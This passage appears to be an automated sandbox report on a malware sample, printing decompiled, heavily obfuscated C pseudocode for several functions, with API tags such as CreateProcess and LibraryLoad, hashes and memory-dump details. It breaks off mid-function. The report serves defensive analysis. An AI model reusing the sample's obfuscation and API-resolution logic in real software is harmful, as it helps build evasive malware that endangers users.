                                                      • Instruction Fuzzy Hash: C19131B15183419FD358CF25D58941BFBF6BBC4358F10892EF19A9A260D3B98A19CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00237B63, Relevance: 2.7, Strings: 2, Instructions: 187COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E00237B63(void* __ecx, void* __edx, void* __eflags) {
				void* _t227;
				signed int _t253;
				signed int _t257;
				signed int _t258;
				void* _t279;
				void* _t280;

				_t279 = _t280 - 0x70;
				_push( *((intOrPtr*)(_t279 + 0x7c)));
				_push( *((intOrPtr*)(_t279 + 0x78)));
				_push(__edx);
				_push(__ecx);
				E0023602B(_t227);
				 *(_t279 + 0x5c) = 0x4f49;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff573d;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) >> 0xe;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) + 0xffff1f14;
				 *(_t279 + 0x5c) =  *(_t279 + 0x5c) ^ 0x00031f13;
				 *(_t279 + 0x20) = 0x2d3b;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) << 0xa;
				 *(_t279 + 0x20) =  *(_t279 + 0x20) ^ 0x00b4ea14;
				 *(_t279 + 0x38) = 0xada;
				_t257 = 0x56;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) * 0xd;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x7978ee92;
				 *(_t279 + 0x38) =  *(_t279 + 0x38) ^ 0x79786b80;
				 *(_t279 + 0x44) = 0x9fd0;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) << 0xd;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) + 0xffff90c4;
				 *(_t279 + 0x44) =  *(_t279 + 0x44) ^ 0x13f99f58;
				 *(_t279 + 0x28) = 0xbdd8;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) / _t257;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65272766;
				 *(_t279 + 0x28) =  *(_t279 + 0x28) ^ 0x65270fe8;
				 *(_t279 + 0x24) = 0xa469;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) * 0x47;
				 *(_t279 + 0x24) =  *(_t279 + 0x24) ^ 0x002db229;
				 *(_t279 + 0x48) = 0xdd17;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) << 4;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) >> 9;
				 *(_t279 + 0x48) =  *(_t279 + 0x48) ^ 0x00005398;
				 *(_t279 + 0x3c) = 0x840;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x7135c857;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) + 0xffffaa29;
				 *(_t279 + 0x3c) =  *(_t279 + 0x3c) ^ 0x71355336;
				 *(_t279 + 0x34) = 0xe245;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x5c1086b0;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) << 0xc;
				 *(_t279 + 0x34) =  *(_t279 + 0x34) ^ 0x064f42a5;
				 *(_t279 + 0x68) = 0x7c59;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 7;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) + 0xdfb1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) >> 1;
				 *(_t279 + 0x68) =  *(_t279 + 0x68) ^ 0x00006add;
				 *(_t279 + 0x1c) = 0x17b0;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) * 0x33;
				 *(_t279 + 0x1c) =  *(_t279 + 0x1c) ^ 0x0004ea7a;
				 *(_t279 + 0xc) = 0x52de;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) >> 3;
				 *(_t279 + 0xc) =  *(_t279 + 0xc) ^ 0x00000565;
				 *(_t279 + 0x14) = 0xa04a;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) + 0x5b3d;
				 *(_t279 + 0x14) =  *(_t279 + 0x14) ^ 0x0000ad98;
				 *(_t279 + 0x10) = 0x88b9;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) << 0xa;
				 *(_t279 + 0x10) =  *(_t279 + 0x10) ^ 0x0222fd12;
				 *(_t279 + 0x58) = 0x8451;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) << 1;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff44cb;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) + 0xffff231f;
				 *(_t279 + 0x58) =  *(_t279 + 0x58) ^ 0xffff3ae7;
				 *(_t279 + 0x2c) = 0xa221;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) << 0xe;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x37ec24ae;
				 *(_t279 + 0x2c) =  *(_t279 + 0x2c) ^ 0x1f641a26;
				 *(_t279 + 0x6c) = 0xb834;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) * 5;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xff22;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) + 0xffff2c65;
				 *(_t279 + 0x6c) =  *(_t279 + 0x6c) ^ 0x00038cf7;
				 *(_t279 + 0x60) = 0x6d71;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) + 0xffff2e20;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) << 0xa;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) >> 7;
				 *(_t279 + 0x60) =  *(_t279 + 0x60) ^ 0x01fcf6fe;
				 *(_t279 + 0x40) = 0xcc9d;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) << 1;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) | 0xa720d145;
				 *(_t279 + 0x40) =  *(_t279 + 0x40) ^ 0xa721d74b;
				 *(_t279 + 0x50) = 0xea3;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) + 0x27fa;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) >> 7;
				 *(_t279 + 0x50) =  *(_t279 + 0x50) ^ 0x00000071;
				 *(_t279 + 0x64) = 0xe156;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) + 0x8b10;
				_t258 = 0x77;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) / _t258;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) << 7;
				 *(_t279 + 0x64) =  *(_t279 + 0x64) ^ 0x0001fc91;
				 *(_t279 + 0x54) = 0xb949;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0xe8c9a038;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
				 *(_t279 + 0x4c) = 0x8c7e;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
				_t171 = _t279 - 0x14; // 0x68cf93e9
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
				 *(_t279 + 0x30) = 0x8a4e;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
				 *(_t279 + 0x18) = 0x537b;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
				E002493A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
				_t193 = _t279 - 0x21c; // 0x68cf91e1
				E002493A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
				_t198 = _t279 - 0x424; // 0x68cf8fd9
				E002493A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
				_t202 = _t279 - 0x21c; // 0x68cf91e1
				E00236636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
				_t208 = _t279 - 0x424; // 0x68cf8fd9
				E00236636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
				_t214 = _t279 - 0x14; // 0x68cf93e9
				_t215 = _t279 - 0x21c; // 0x68cf91e1
				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
				_t217 = _t279 - 0x424; // 0x68cf8fd9
				 *((intOrPtr*)(_t279 - 8)) = _t217;
				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
				_t253 = E00247BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
				asm("sbb eax, eax");
				return  ~_t253 + 1;
			}









                                                      0x00237b64
                                                      0x00237b6f
                                                      0x00237b72
                                                      0x00237b75
                                                      0x00237b76
                                                      0x00237b77
                                                      0x00237b7c
                                                      0x00237b85
                                                      0x00237b8c
                                                      0x00237b90
                                                      0x00237b97
                                                      0x00237b9e
                                                      0x00237ba5
                                                      0x00237ba9
                                                      0x00237bb0
                                                      0x00237bbd
                                                      0x00237bbe
                                                      0x00237bc1
                                                      0x00237bc8
                                                      0x00237bcf
                                                      0x00237bd6
                                                      0x00237bda
                                                      0x00237be1
                                                      0x00237be8
                                                      0x00237bf4
                                                      0x00237bf7
                                                      0x00237bfe
                                                      0x00237c05
                                                      0x00237c10
                                                      0x00237c13
                                                      0x00237c1a
                                                      0x00237c21
                                                      0x00237c25
                                                      0x00237c29
                                                      0x00237c30
                                                      0x00237c37
                                                      0x00237c3e
                                                      0x00237c45
                                                      0x00237c4c
                                                      0x00237c53
                                                      0x00237c5a
                                                      0x00237c5e
                                                      0x00237c65
                                                      0x00237c6c
                                                      0x00237c70
                                                      0x00237c77
                                                      0x00237c7a
                                                      0x00237c81
                                                      0x00237c8c
                                                      0x00237c8f
                                                      0x00237c96
                                                      0x00237c9d
                                                      0x00237ca1
                                                      0x00237ca8
                                                      0x00237caf
                                                      0x00237cb6
                                                      0x00237cbd
                                                      0x00237cc4
                                                      0x00237cc8
                                                      0x00237ccf
                                                      0x00237cd6
                                                      0x00237cd9
                                                      0x00237ce0
                                                      0x00237ce7
                                                      0x00237cee
                                                      0x00237cf5
                                                      0x00237cf9
                                                      0x00237d00
                                                      0x00237d07
                                                      0x00237d12
                                                      0x00237d15
                                                      0x00237d1c
                                                      0x00237d23
                                                      0x00237d2a
                                                      0x00237d33
                                                      0x00237d3a
                                                      0x00237d3e
                                                      0x00237d42
                                                      0x00237d49
                                                      0x00237d50
                                                      0x00237d53
                                                      0x00237d5a
                                                      0x00237d61
                                                      0x00237d68
                                                      0x00237d6f
                                                      0x00237d73
                                                      0x00237d77
                                                      0x00237d7e
                                                      0x00237d8a
                                                      0x00237d8d
                                                      0x00237d90
                                                      0x00237d94
                                                      0x00237d9b
                                                      0x00237da2
                                                      0x00237dad
                                                      0x00237db4
                                                      0x00237db7
                                                      0x00237dbe
                                                      0x00237dc9
                                                      0x00237dcc
                                                      0x00237dcf
                                                      0x00237dd3
                                                      0x00237dda
                                                      0x00237de1
                                                      0x00237de5
                                                      0x00237dec
                                                      0x00237df3
                                                      0x00237dfa
                                                      0x00237dfe
                                                      0x00237e14
                                                      0x00237e21
                                                      0x00237e32
                                                      0x00237e3a
                                                      0x00237e4b
                                                      0x00237e53
                                                      0x00237e65
                                                      0x00237e6d
                                                      0x00237e7c
                                                      0x00237e84
                                                      0x00237e87
                                                      0x00237e8a
                                                      0x00237e90
                                                      0x00237e93
                                                      0x00237e99
                                                      0x00237ea5
                                                      0x00237eb2
                                                      0x00237ebc
                                                      0x00237ec4

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID: 6S5q$f''e
                                                      • API String ID: 3080627654-2864536462
                                                      • Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                                      • Instruction ID: 93ea29863e2991b4071ee83a6b47056cd45020bb154e315fc6b5f52d9e169b23
                                                      • Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                                      • Instruction Fuzzy Hash: 9EA1CFB140134D9BEF59CF61C9898CE3BB5BF04358F508119FD2A962A0D3BAD959CF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023B41F, Relevance: 2.6, Strings: 2, Instructions: 76COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E0023B41F(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _t91;
				signed int* _t93;
				intOrPtr _t95;
				signed int _t103;
				signed int _t104;

				_v44 = _v44 & 0x00000000;
				_v48 = 0x783c80;
				_v8 = 0x978d;
				_v8 = _v8 >> 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 | 0x918d7e28;
				_v8 = _v8 ^ 0x918d7bef;
				_v28 = 0x8ae6;
				_v28 = _v28 + 0xffff2048;
				_v28 = _v28 ^ 0xfffff0f4;
				_v40 = 0x90b0;
				_v40 = _v40 + 0x186c;
				_v40 = _v40 ^ 0x0000e60c;
				_v12 = 0x4bc7;
				_t103 = __edx;
				_v12 = _v12 * 0x77;
				_v12 = _v12 >> 8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x000165a0;
				_v36 = 0x87ea;
				_v36 = _v36 | 0x75974cd4;
				_v36 = _v36 ^ 0x75979443;
				_v32 = 0x7f4c;
				_v32 = _v32 ^ 0x8971dc13;
				_v32 = _v32 ^ 0x89718547;
				_v24 = 0xd36b;
				_t104 = 0x3c;
				_v24 = _v24 * 9;
				_v24 = _v24 << 1;
				_v24 = _v24 >> 5;
				_v24 = _v24 ^ 0x000045e9;
				_v20 = 0xf34d;
				_v20 = _v20 + 0x5309;
				_v20 = _v20 << 0xa;
				_v20 = _v20 | 0x23e3e3ea;
				_v20 = _v20 ^ 0x27fbee67;
				_v16 = 0xef72;
				_v16 = _v16 * 0x55;
				_v16 = _v16 << 0x10;
				_v16 = _v16 / _t104;
				_v16 = _v16 ^ 0x0225d37d;
				_push(_v28);
				_t91 = E00231000(_v40, _v12, _v36, _v32, E0024889D(_t93, _v8, _v16));
				_t95 =  *0x24ca28; // 0x683138
				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
				return E00242025(_v24, _t90, _v20, _v16);
			}



















                                                      0x0023b425
                                                      0x0023b429
                                                      0x0023b430
                                                      0x0023b437
                                                      0x0023b43b
                                                      0x0023b43f
                                                      0x0023b446
                                                      0x0023b44d
                                                      0x0023b454
                                                      0x0023b45b
                                                      0x0023b462
                                                      0x0023b469
                                                      0x0023b470
                                                      0x0023b477
                                                      0x0023b484
                                                      0x0023b48a
                                                      0x0023b48d
                                                      0x0023b491
                                                      0x0023b495
                                                      0x0023b49c
                                                      0x0023b4a3
                                                      0x0023b4aa
                                                      0x0023b4b1
                                                      0x0023b4b8
                                                      0x0023b4bf
                                                      0x0023b4c6
                                                      0x0023b4d1
                                                      0x0023b4d2
                                                      0x0023b4d5
                                                      0x0023b4d8
                                                      0x0023b4dc
                                                      0x0023b4e3
                                                      0x0023b4ea
                                                      0x0023b4f1
                                                      0x0023b4f5
                                                      0x0023b4fc
                                                      0x0023b503
                                                      0x0023b50e
                                                      0x0023b511
                                                      0x0023b51a
                                                      0x0023b51d
                                                      0x0023b524
                                                      0x0023b53e
                                                      0x0023b543
                                                      0x0023b551
                                                      0x0023b565

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: 81h$#
                                                      • API String ID: 1029625771-3526793653
                                                      • Opcode ID: b4b1551517829ee76a5dad8bcea7f9b90a5560f2cb7bcef6a79452c07fa69c98
                                                      • Instruction ID: 421291b48f5595a3ab998cd674b33172bfb53483b9bc83e09fbfcd0e7c04ad23
                                                      • Opcode Fuzzy Hash: b4b1551517829ee76a5dad8bcea7f9b90a5560f2cb7bcef6a79452c07fa69c98
                                                      • Instruction Fuzzy Hash: 2241EF71C0121AEBDF08CFA5C94A4EEFBB1FB54318F208599D411B62A4D7B90B58CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023568E, Relevance: 1.4, Strings: 1, Instructions: 184COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E0023568E(void* __ecx, void* __edx) {
				void* _t188;
				void* _t209;
				void* _t210;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				intOrPtr _t242;
				void* _t245;
				void* _t248;
				void* _t249;

				_t248 = _t249 - 0x5c;
				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
				_t245 = __edx;
				_push(0);
				_push( *((intOrPtr*)(_t248 + 0x78)));
				_push( *((intOrPtr*)(_t248 + 0x74)));
				_push( *((intOrPtr*)(_t248 + 0x70)));
				_push(_t242);
				_push( *((intOrPtr*)(_t248 + 0x68)));
				_push( *((intOrPtr*)(_t248 + 0x64)));
				_push(__edx);
				_push(__ecx);
				E0023602B(_t188);
				 *(_t248 + 0x38) = 0xda0c;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
				_t215 = 0x75;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
				 *(_t248 + 0x54) = 0xb39d;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
				 *(_t248 + 0x1c) = 0x5da7;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
				 *(_t248 + 0x30) = 0xba31;
				_t216 = 0x2c;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
				 *(_t248 + 0x2c) = 0x6402;
				_t217 = 0x3f;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
				 *(_t248 + 0x34) = 0x3e45;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
				 *(_t248 + 0x3c) = 0xfd38;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
				 *(_t248 + 0x40) = 0xcc4c;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
				 *(_t248 + 0x28) = 0x6724;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
				 *(_t248 + 0x24) = 0x9d87;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
				 *(_t248 + 0x58) = 0xb89d;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
				 *(_t248 + 0x44) = 0x534f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
				 *(_t248 + 0x20) = 0x7c36;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
				_t218 = 0x73;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
				 *(_t248 + 0x4c) = 0x6d80;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
				 *(_t248 + 0x50) = 0x11c0;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
				_t219 = 0x49;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
				 *(_t248 + 0x18) = 0x8ddc;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
				 *(_t248 + 0x14) = 0xfbdb;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
				 *(_t248 + 0x48) = 0xd404;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
				_t220 =  *(_t248 + 0x38);
				E002493A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
				_t209 = E0024976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
				if(_t209 == 0) {
					_t210 = 0;
				} else {
					if(_t242 == 0) {
						E00244F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
						E00244F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t210 = 1;
				}
				return _t210;
			}















                                                      0x0023568f
                                                      0x0023569b
                                                      0x0023569e
                                                      0x002356a0
                                                      0x002356a2
                                                      0x002356a5
                                                      0x002356a8
                                                      0x002356ab
                                                      0x002356ac
                                                      0x002356af
                                                      0x002356b2
                                                      0x002356b3
                                                      0x002356b4
                                                      0x002356b9
                                                      0x002356c2
                                                      0x002356cc
                                                      0x002356cf
                                                      0x002356d2
                                                      0x002356d9
                                                      0x002356e0
                                                      0x002356e4
                                                      0x002356ef
                                                      0x002356f2
                                                      0x002356f9
                                                      0x00235700
                                                      0x0023570e
                                                      0x00235711
                                                      0x00235718
                                                      0x00235722
                                                      0x00235727
                                                      0x0023572c
                                                      0x00235733
                                                      0x0023573a
                                                      0x00235745
                                                      0x00235746
                                                      0x00235749
                                                      0x0023574d
                                                      0x00235754
                                                      0x0023575b
                                                      0x0023575f
                                                      0x00235763
                                                      0x0023576a
                                                      0x00235771
                                                      0x0023577c
                                                      0x0023577f
                                                      0x00235786
                                                      0x0023578d
                                                      0x00235799
                                                      0x0023579c
                                                      0x002357a3
                                                      0x002357aa
                                                      0x002357b1
                                                      0x002357b4
                                                      0x002357bb
                                                      0x002357c2
                                                      0x002357ca
                                                      0x002357cd
                                                      0x002357d4
                                                      0x002357db
                                                      0x002357df
                                                      0x002357e6
                                                      0x002357ea
                                                      0x002357f1
                                                      0x002357f8
                                                      0x00235801
                                                      0x00235808
                                                      0x0023580f
                                                      0x00235816
                                                      0x00235822
                                                      0x00235827
                                                      0x0023582c
                                                      0x00235833
                                                      0x0023583a
                                                      0x00235841
                                                      0x00235848
                                                      0x0023584f
                                                      0x00235856
                                                      0x0023585d
                                                      0x00235867
                                                      0x0023586a
                                                      0x0023586d
                                                      0x00235874
                                                      0x0023587b
                                                      0x00235882
                                                      0x00235889
                                                      0x00235890
                                                      0x0023589b
                                                      0x002358a1
                                                      0x002358a8
                                                      0x002358af
                                                      0x002358b2
                                                      0x002358b9
                                                      0x002358c0
                                                      0x002358d3
                                                      0x002358d6
                                                      0x002358de
                                                      0x00235915
                                                      0x0023591f
                                                      0x00235951
                                                      0x00235921
                                                      0x00235923
                                                      0x0023593a
                                                      0x00235948
                                                      0x00235925
                                                      0x00235928
                                                      0x00235929
                                                      0x0023592a
                                                      0x0023592b
                                                      0x0023592b
                                                      0x0023592e
                                                      0x0023592e
                                                      0x00235959

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: @p
                                                      • API String ID: 963392458-2609516012
                                                      • Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                                      • Instruction ID: 9b68dfc197bd47c961eea7753a341801ad8ae656a43dfa8ae10a79af61eee005
                                                      • Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                                      • Instruction Fuzzy Hash: DB912572510248EFDF58CF61C94A9CE3BA1FF44348F508119FE1A961A0D3B6D959CF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023C0C6, Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 90%
                                                      			E0023C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v592;
				void* _t141;
				void* _t159;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t141);
				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v72 = 0x2e7eef;
				_v68 = 0x12a0e3;
				_v36 = 0x822d;
				_v36 = _v36 ^ 0x7542ca13;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00755fa2;
				_v48 = 0xc0ea;
				_t161 = 0x4d;
				_v48 = _v48 * 0x52;
				_v48 = _v48 + 0x53ba;
				_v48 = _v48 ^ 0x003e0539;
				_v8 = 0xf2be;
				_v8 = _v8 ^ 0xca92c6dd;
				_v8 = _v8 | 0xdeb53509;
				_v8 = _v8 + 0x330e;
				_v8 = _v8 ^ 0xdeb75724;
				_v28 = 0xbc60;
				_v28 = _v28 * 3;
